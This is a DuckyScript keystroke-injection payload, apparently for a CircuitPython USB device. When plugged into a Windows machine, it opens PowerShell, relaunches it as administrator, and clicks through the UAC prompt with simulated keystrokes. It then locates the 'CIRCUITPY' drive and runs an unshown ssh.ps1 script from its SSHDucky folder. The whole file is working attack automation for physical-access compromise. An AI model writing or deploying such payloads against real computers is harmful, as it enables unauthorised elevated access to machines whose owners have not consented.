
REM Open Powershell In Admin Mode
DELAY 5000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING start-process powershell -verb runas ; exit
ENTER
DELAY 1000
LEFTARROW
ENTER
ALT y
DELAY 500 


REM Get the drive letter of CIRCUITPY and store it in a variable
STRING $driveLetter = (Get-Volume | Where-Object { $_.FileSystemLabel -eq "CIRCUITPY" }).DriveLetter
ENTER
DELAY 1000
STRING $path = "$driveLetter" + ":" + "\SSHDucky"
ENTER
DELAY 100
STRING cd $path
ENTER

STRING .\ssh.ps1 ; exit
ENTER
DELAY 5000